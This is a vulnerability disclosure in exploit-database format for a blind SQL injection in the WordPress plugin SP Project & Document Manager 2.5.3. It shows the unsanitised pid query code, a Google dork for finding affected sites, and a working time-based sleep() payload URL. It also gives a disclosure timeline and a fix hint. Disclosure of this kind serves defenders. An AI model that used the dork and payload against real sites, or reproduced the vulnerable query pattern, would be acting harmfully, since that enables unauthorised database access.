41 lines
No EOL
1.4 KiB
Text
41 lines
No EOL
1.4 KiB
Text
# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
|
|
# Google Dork: inurl:wp-content/plugins/sp-client-document-manager
|
|
# Date: 2015-03-04
|
|
# Exploit Author: catsecurity
|
|
# Vendor Homepage: http://smartypantsplugins.com
|
|
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
|
|
# Version: version 2.5.3 and previous version
|
|
# Tested on: Chrome (It's PHP Application)
|
|
# CVE : N/A
|
|
|
|
|
|
# Timeline #
|
|
[2015.03.05] Reported to the Vendor
|
|
[2015.03.06?] Fixed in Update 2.5.4
|
|
|
|
|
|
# Details #
|
|
|
|
- This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin.
|
|
- Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
|
|
- "pid" variable is not sanitized
|
|
|
|
|
|
# Vulnerable code #
|
|
|
|
Line 1132: echo '<div id="dlg_cdm_thumbnails">';
|
|
Line 1133: if ($_GET['pid'] != "") {
|
|
Line 1134: $r_current_project = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_GET['pid'] . "", ARRAY_A);
|
|
Line 1135: }
|
|
|
|
|
|
# POC #
|
|
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]
|
|
|
|
example:
|
|
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)
|
|
|
|
if yes it will sleep 5 seconds.
|
|
|
|
|
|
This vulnerable parameters must trance to integer |